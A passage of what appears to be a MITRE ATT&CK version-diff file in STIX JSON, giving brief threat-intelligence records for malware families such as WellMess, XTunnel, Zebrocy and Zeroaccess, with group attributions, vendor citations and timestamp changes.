been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0514", + "external_id": "S0514" + }, + { + "source_name": "CISA WellMess July 2020", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. 
Retrieved September 24, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" + }, + { + "source_name": "PWC WellMess July 2020", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WellMess" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:03.067000+00:00\", \"old_value\": \"2025-04-16 20:38:02.903000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22addc7b-b39f-483d-979a-1b35147da5de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:40.004000+00:00", + "modified": "2025-04-25 14:42:50.511000+00:00", + "name": "WinMM", + "description": "[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). 
(Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0059", + "external_id": "S0059" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WinMM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.511000+00:00\", \"old_value\": \"2025-04-16 20:37:58.498000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a8d3d497-2da9-4797-8e0b-ed176be08654", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:20.703000+00:00", + "name": "Wingbird", + "description": "[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. 
(Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0176", + "external_id": "S0176" + }, + { + "source_name": "Wingbird", + "description": "(Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft Wingbird Nov 2017)" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft Wingbird Nov 2017", + "description": "Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. 
Retrieved November 27, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Wingbird" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:20.703000+00:00\", \"old_value\": \"2025-04-16 20:38:29.211000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:32.915000+00:00", + "modified": "2025-04-25 14:44:15.681000+00:00", + "name": "Wiper", + "description": "[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0041", + "external_id": "S0041" + }, + { + "source_name": "Dell Wiper", + "description": "Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. 
Retrieved May 13, 2015.", + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:15.681000+00:00\", \"old_value\": \"2025-04-16 20:38:28.028000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--59a97b15-8189-4d51-9404-e1ce8ea4a069", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:27.602000+00:00", + "name": "XAgentOSX", + "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0161", + "external_id": "S0161" + }, + { + "source_name": "XAgentOSX", + "description": "(Citation: XAgentOSX 2017)" + }, + { + "source_name": "OSX.Sofacy", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "XAgentOSX 2017", + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. 
Retrieved July 12, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XAgentOSX", + "OSX.Sofacy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:27.602000+00:00\", \"old_value\": \"2025-04-16 20:38:10.547000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--7343e208-7cab-45f2-a47b-41ba5e2f0fab", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:09.453000+00:00", + "modified": "2025-04-25 14:43:45.148000+00:00", + "name": "XTunnel", + "description": "[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. 
(Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0117", + "external_id": "S0117" + }, + { + "source_name": "XTunnel", + "description": "(Citation: ESET Sednit Part 2)" + }, + { + "source_name": "Trojan.Shunnael", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "X-Tunnel", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "XAPS", + "description": "(Citation: ESET Sednit Part 2)" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "Invincea XTunnel", + "description": "Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.", + "url": "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/" + }, + { + "source_name": "ESET Sednit Part 2", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. 
Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XTunnel", + "Trojan.Shunnael", + "X-Tunnel", + "XAPS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:45.148000+00:00\", \"old_value\": \"2025-04-16 20:38:17.007000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "malware", + "id": "malware--6a92d80f-cc65-45f6-aa66-3cdea6786b3c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 13:28:47.452000+00:00", + "modified": "2025-04-25 14:43:40.462000+00:00", + "name": "Xbash", + "description": "[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0341", + "external_id": "S0341" + }, + { + "source_name": "Xbash", + "description": "(Citation: Unit42 Xbash Sept 2018)" + }, + { + "source_name": "Unit42 Xbash Sept 2018", + "description": "Xiao, C. (2018, September 17). 
Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Xbash" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.462000+00:00\", \"old_value\": \"2025-04-16 20:38:15.191000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--a4f57468-fbd5-49e4-8476-52088220b92d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:17.288000+00:00", + "name": "Zebrocy", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. 
(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0251", + "external_id": "S0251" + }, + { + "source_name": "Zebrocy", + "description": "(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Zekapab", + "description": "(Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Unit42 Cannon Nov 2018", + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + }, + { + "source_name": "CISA Zebrocy Oct 2020", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b" + }, + { + "source_name": "CyberScoop APT28 Nov 2018", + "description": "Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. 
Retrieved July 16, 2019.", + "url": "https://www.cyberscoop.com/apt28-brexit-phishing-accenture/" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Zebrocy", + "Zekapab" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "3.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:17.288000+00:00\", \"old_value\": \"2025-04-16 20:38:28.500000+00:00\"}}}", + "previous_version": "3.0" + }, + { + "type": "malware", + "id": "malware--552462b9-ae79-49dd-855c-5973014e157f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:20.949000+00:00", + "modified": "2025-04-25 14:43:22.946000+00:00", + "name": "Zeroaccess", + "description": "[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0027", + "external_id": "S0027" + }, + { + "source_name": "Sophos ZeroAccess", + "description": "Wyke, J. (2012, April). ZeroAccess. 
Retrieved July 18, 2016.", + "url": "https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:22.946000+00:00\", \"old_value\": \"2025-04-16 20:38:08.895000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:42:42.902000+00:00", + "name": "adbupd", + "description": "[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0202", + "external_id": "S0202" + }, + { + "source_name": "adbupd", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. 
Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "adbupd" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.902000+00:00\", \"old_value\": \"2025-04-16 20:37:56.265000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 18:44:10.896000+00:00", + "modified": "2025-04-25 14:44:46.558000+00:00", + "name": "build_downer", + "description": "[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0471", + "external_id": "S0471" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. 
Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "build_downer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:46.558000+00:00\", \"old_value\": \"2025-04-16 20:38:36.962000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8be7c69e-d8e3-4970-9668-61de08e508cc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 19:37:49.361000+00:00", + "modified": "2025-04-25 14:43:58.304000+00:00", + "name": "down_new", + "description": " [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0472", + "external_id": "S0472" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. 
Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "down_new" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:58.304000+00:00\", \"old_value\": \"2025-04-16 20:38:21.345000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:46.890000+00:00", + "modified": "2025-04-25 14:44:13.298000+00:00", + "name": "hcdLoader", + "description": "[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0071", + "external_id": "S0071" + }, + { + "source_name": "Dell Lateral Movement", + "description": "Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. 
Retrieved January 25, 2016.", + "url": "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "hcdLoader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:13.298000+00:00\", \"old_value\": \"2025-04-16 20:38:26.900000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--e8268361-a599-4e45-bd3f-71c8c7e700c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:45.315000+00:00", + "modified": "2025-04-25 14:44:58.407000+00:00", + "name": "httpclient", + "description": "[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0068", + "external_id": "S0068" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. 
Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "httpclient" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:58.407000+00:00\", \"old_value\": \"2025-04-16 20:38:40.829000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2cfe8a26-5be7-4a09-8915-ea3d9e787513", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:56.342000+00:00", + "name": "iKitten", + "description": "[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0278", + "external_id": "S0278" + }, + { + "source_name": "iKitten", + "description": "(Citation: objsee mac malware 2017)." + }, + { + 